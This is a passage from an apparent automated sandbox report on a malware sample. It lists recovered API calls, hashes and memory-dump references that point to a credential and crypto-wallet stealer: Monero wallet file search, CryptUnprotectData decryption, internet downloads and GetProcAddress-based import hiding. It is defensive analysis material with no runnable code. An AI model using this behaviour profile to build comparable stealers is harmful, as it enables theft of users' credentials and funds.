                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: ccef6bfc26b0a5115b5aaea25c9c5b6a562da04221a4d1ac3ef2a9807b41f6e0
                                    • Instruction ID: 444ebbfabfb321d50658095ec135d82fcaf262b0ed1eb8bf2dd8ada4fc777d25
                                    • Opcode Fuzzy Hash: ccef6bfc26b0a5115b5aaea25c9c5b6a562da04221a4d1ac3ef2a9807b41f6e0
                                    • Instruction Fuzzy Hash: 4E415C71950218ABCF24DB94DC99FEEB778FF58700F604199E10AA6191DB742F88CFA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018501A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00185021
                                    • InternetOpenA.WININET(001A0DC7,00000000,00000000,00000000,00000000), ref: 0018503A
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00185061
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00185091
                                    • InternetCloseHandle.WININET(?), ref: 00185109
                                    • InternetCloseHandle.WININET(?), ref: 00185116
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: 4a9e6c93a91f07086a760d5cbcfa3696a09f615b823ec084816e06c597c8b398
                                    • Instruction ID: 85a2047ca5ebfb1c338699f35bc387e9b1e3b8315ad22421b2c20eb8932a1d05
                                    • Opcode Fuzzy Hash: 4a9e6c93a91f07086a760d5cbcfa3696a09f615b823ec084816e06c597c8b398
                                    • Instruction Fuzzy Hash: C93109B5A00218ABDB24DF54CC85BDDB7B9FB48304F5081D9FA09A7281D7B06EC58F98
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001A0C1F), ref: 0018E2E2
                                    • StrCmpCA.SHLWAPI(?,001A149C), ref: 0018E332
                                    • StrCmpCA.SHLWAPI(?,001A14A0), ref: 0018E348
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0018EA1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: daeee0fa3580baf31801feca02eb4eb5c510dfc6881304b1cc35064fda9734de
                                    • Instruction ID: 3e31b372b50e7826dffe28d59370e92f4cc060be0dd48de78ca8854353271ffe
                                    • Opcode Fuzzy Hash: daeee0fa3580baf31801feca02eb4eb5c510dfc6881304b1cc35064fda9734de
                                    • Instruction Fuzzy Hash: 2412ED72910118AACF19FB64DC96EED7379AF65300F8045A9B50A520A1EF746F4CCFE2
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001990BE
                                    • Process32First.KERNEL32(001A0AB3,00000128), ref: 001990D2
                                    • Process32Next.KERNEL32(001A0AB3,00000128), ref: 001990E7
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 001990FC
                                    • CloseHandle.KERNEL32(001A0AB3), ref: 0019911A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 7d673901a6ff1ce3ef2179760c695b0bd521c23de2ac523be7a527070ae66cca
                                    • Instruction ID: 4e269bbab0df7d9f9f9898028f18e638a25c6fae7285c4bbd488a810a00476bf
                                    • Opcode Fuzzy Hash: 7d673901a6ff1ce3ef2179760c695b0bd521c23de2ac523be7a527070ae66cca
                                    • Instruction Fuzzy Hash: 2D010C75A10208EBDF25DFA4DD89BDEBBF8BB09710F104198A50A97240DB719A44DF50
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013ADC70,00000000,?,001A0DE0,00000000,?,00000000,00000000), ref: 00197503
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0019750A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013ADC70,00000000,?,001A0DE0,00000000,?,00000000,00000000,?), ref: 0019751D
                                    • wsprintfA.USER32 ref: 00197557
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 4d46869fabec53b7a0f5b2d57604ca2907a5efa1a393530b1e21e16dd2f56145
                                    • Instruction ID: 31f1cfe6639407bdfb0ecce6b425ad2bd9367ad53aed2176816a95a2827101d3
                                    • Opcode Fuzzy Hash: 4d46869fabec53b7a0f5b2d57604ca2907a5efa1a393530b1e21e16dd2f56145
                                    • Instruction Fuzzy Hash: 9411ADB1E05218EBEB20CB54DC49FAABB7CFB05721F104399F90A932D0C7745A44CB91
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00189BD4
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00189BF3
                                    • LocalFree.KERNEL32(?), ref: 00189C23
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 774dca8bb8a3ada7ecc0ba96cce6e23bbcd7856aa490c061afb6f3455b5465a9
                                    • Instruction ID: 1226315593769911a9f9662640c2279036b360f6b0ebf95c9b41ac4186b37f11
                                    • Opcode Fuzzy Hash: 774dca8bb8a3ada7ecc0ba96cce6e23bbcd7856aa490c061afb6f3455b5465a9
                                    • Instruction Fuzzy Hash: 1011C9B8A00209EFCB05DF94D985AAEB7B9FF89300F104558ED15A7350D730AE51CF61
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197320
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00197327
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0019733F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: a825175ecfc65cadaca6decbcf3cb44d93e6599661327ae4a0d96f350022784f
                                    • Instruction ID: 663ecfc720d916b247909c1345370a43b10e26ab14500e9e2e6d2d0a810f38c2
                                    • Opcode Fuzzy Hash: a825175ecfc65cadaca6decbcf3cb44d93e6599661327ae4a0d96f350022784f
                                    • Instruction Fuzzy Hash: FEF062B1954248EFCB04DF98DD46BAEFBBCFB05B21F10021AFA05A3680C7745504CBA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: InfoSystemwsprintf
                                    • String ID:
                                    • API String ID: 2452939696-0
                                    • Opcode ID: d6a84a3528d7eb077f8e031c3181a99c0e0c4370448cc190c7fc2752d83d50af
                                    • Instruction ID: 600031a49efa90c8f8f282b39bcbd19f86d1ce4c0a638c319aa4270e519ad05e
                                    • Opcode Fuzzy Hash: d6a84a3528d7eb077f8e031c3181a99c0e0c4370448cc190c7fc2752d83d50af
                                    • Instruction Fuzzy Hash: 54F090B2914218EBCB14CF88ED45FAAFBBCFB49B24F404669F505A3280D7756904CBA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 1995e0-1995ea 634 1995f0-199a01 GetProcAddress * 43 633->634 635 199a06-199a9a LoadLibraryA * 8 633->635 634->635 636 199a9c-199b11 GetProcAddress * 5 635->636 637 199b16-199b1d 635->637 636->637 638 199b23-199be1 GetProcAddress * 8 637->638 639 199be6-199bed 637->639 638->639 640 199c68-199c6f 639->640 641 199bef-199c63 GetProcAddress * 5 639->641 642 199c75-199d02 GetProcAddress * 6 640->642 643 199d07-199d0e 640->643 641->640 642->643 644 199def-199df6 643->644 645 199d14-199dea GetProcAddress * 9 643->645 646 199df8-199e6d GetProcAddress * 5 644->646 647 199e72-199e79 644->647 645->644 646->647 648 199e7b-199ea7 GetProcAddress * 2 647->648 649 199eac-199eb3 647->649 648->649 650 199ee5-199eec 649->650 651 199eb5-199ee0 GetProcAddress * 2 649->651 652 199fe2-199fe9 650->652 653 199ef2-199fdd GetProcAddress * 10 650->653 651->650 654 199feb-19a048 GetProcAddress * 4 652->654 655 19a04d-19a054 652->655 653->652 654->655 656 19a06e-19a075 655->656 657 19a056-19a069 GetProcAddress 655->657 658 19a0d8-19a0d9 656->658 659 19a077-19a0d3 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,01396280), ref: 001995FD
                                    • GetProcAddress.KERNEL32(75900000,01396600), ref: 00199615
                                    • GetProcAddress.KERNEL32(75900000,013A8F10), ref: 0019962E
                                    • GetProcAddress.KERNEL32(75900000,013A8F70), ref: 00199646
                                    • GetProcAddress.KERNEL32(75900000,013ACE10), ref: 0019965E
                                    • GetProcAddress.KERNEL32(75900000,013ACFC0), ref: 00199677
                                    • GetProcAddress.KERNEL32(75900000,0139B1F8), ref: 0019968F
                                    • GetProcAddress.KERNEL32(75900000,013ACE28), ref: 001996A7
                                    • GetProcAddress.KERNEL32(75900000,013ACE70), ref: 001996C0
                                    • GetProcAddress.KERNEL32(75900000,013ACEA0), ref: 001996D8
                                    • GetProcAddress.KERNEL32(75900000,013ACF60), ref: 001996F0
                                    • GetProcAddress.KERNEL32(75900000,01396580), ref: 00199709
                                    • GetProcAddress.KERNEL32(75900000,01396400), ref: 00199721
                                    • GetProcAddress.KERNEL32(75900000,013962A0), ref: 00199739
                                    • GetProcAddress.KERNEL32(75900000,013965E0), ref: 00199752
                                    • GetProcAddress.KERNEL32(75900000,013ACEB8), ref: 0019976A
                                    • GetProcAddress.KERNEL32(75900000,013ACED0), ref: 00199782
                                    • GetProcAddress.KERNEL32(75900000,0139B068), ref: 0019979B
                                    • GetProcAddress.KERNEL32(75900000,01396520), ref: 001997B3
                                    • GetProcAddress.KERNEL32(75900000,013ACF18), ref: 001997CB
                                    • GetProcAddress.KERNEL32(75900000,013ACF78), ref: 001997E4
                                    • GetProcAddress.KERNEL32(75900000,013ACE88), ref: 001997FC
                                    • GetProcAddress.KERNEL32(75900000,013ACF90), ref: 00199814
                                    • GetProcAddress.KERNEL32(75900000,01396300), ref: 0019982D
